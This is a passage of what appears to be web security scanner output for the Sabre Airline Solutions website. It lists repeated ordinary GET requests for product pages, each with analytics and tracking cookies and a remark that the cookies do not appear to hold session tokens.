GET /home/products_services/product/sabre_aircentre_acars_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322611; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_acars_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322089; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_airspace_flow_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322623; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_airspace_flow_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322062; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3Bi%3A4%3Bs%3A43%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_sell%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_crew_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322616; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A1%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_css%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_group_ecommerce%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_crew_control/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322045; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_crew_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322625; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Finteract_interface%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_crew_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_crew_qualifier HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322624; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_crew_qualifier/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322054; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_flight_explorer HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322636; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_flight_explorer/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322098; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_flight_plan_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322102; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_gate_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322646; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_gate_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322647; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_load_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322650; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_load_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322107; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_movement_control/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322120; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_movement_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322675; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_movement_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322145; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A3%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
